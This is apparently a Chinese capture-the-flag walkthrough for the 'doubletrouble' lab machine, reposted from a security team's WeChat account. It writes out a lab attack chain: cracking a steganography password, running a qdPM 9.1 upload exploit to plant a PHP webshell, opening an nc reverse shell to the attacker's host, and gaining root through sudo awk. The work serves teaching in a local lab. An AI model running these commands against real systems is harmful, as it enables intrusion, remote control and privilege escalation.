01 主机探测
首先还是先进行主机探测
发现192.168.56.3主机存活,详细探测一下端口,似乎没发现什么有用的内容
访问一下80端口,发现是一个登录页面
查看一下源代码,没发现什么线索
注意到登录框上有个qdPM9.1,猜测是一个cms,在Google上进行相关搜索漏洞信息。
根据网上的一个文章发现存在一个反射型xss,但是跟我们获取flag相关性不是很高。相关文章:
https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting.html
没再发现其他有价值的信息。扫描一下目录
能未授权访问目录,目录下还是有很多东西的
翻了很久,发现一个邮箱的账号密码
# User:# fabien:# username: fabien# password: changeme# name: Fabien Potencier# email: fabien.potencier@symfony-project.com# kris:# username: Kris.Wallsmith# password: changeme# name: Kris Wallsmith# email: kris.wallsmith@symfony-project.com
拿着找到的账号密码登录,发现报错“Error: No match for Email and/or Password”,登不上
然后继续翻,找到一个数据库的账号密码文件,试了一下,也没登上去
翻了很久,还是没找到有用的东西,突然间想到刚刚的那个图片是在secret文件夹下,有点可疑,会不会是图片隐写?
将图片下载下来,然后用strings命令查看,没发现有东西
binwalk命令查看文件里面是否还有其他的内容,没有发现
用stegseek 爆一下图片密码
注意:stegseek在kali中需要自己安装,在
https://github.com/RickdeJager/stegseek/releases下载stegseek_0.6-1.deb,使用:sudo dpkg -i stegseek_0.6-1.deb进行安装,安装成功后使用字典进行爆破获得密码和文件名,命令:
stegseek --crack doubletrouble.jpg /usr/share/wordlists/rockyou.txt upfine.txt发现用户名和密码:
otisrush@localhost.comotis666
登录后台,查看一下后台的功能
发现一个能上传文件的地方,或许能上传后门木马
先上传一个正常的照片上去,发现报错
额,那再去刚刚的漏洞网站看看有没有可以利用的漏洞,这里利用第一个
将第一个py文件下载下来,下载下来后使用以下命令进行执行
python 50944.py -url http://192.168.56.3/ -p otis666 -u otisrush@localhost.com成功返回链接
访问一下,成功返回信息
http://192.168.56.3/uploads/users/864605-backdoor.php?cmd=whoami
既然可以执行命令,那就尝试进行反弹shell
在浏览器中执行:nc -e /bin/bash 192.168.56.4 1234总命令:http://192.168.56.3/uploads/users/864605-backdoor.php?cmd=nc%20-e%20/bin/bash%20192.168.56.4%201234在kali上开启监听:nc -lvvp 1234
收到了反弹回来的shell,这是一个伪shell,我们先返回一个正常shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
下一步就是提权。sudo -l 查看一波越权命令,显示存在一个awk命令
查询下awk命令的提权方式进行提权,提权成功。命令:
sudo awk 'BEGIN {system("/bin/sh")}'
进入/root目录,查看flag,但是发现一个ova文件,额,还有这种操作?
在靶机上开启http服务,下载ova文件
欲知后事如何,且听我下回分说
原文始发于微信公众号(GSDK安全团队):vulhub靶场 - doubletrouble(一)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论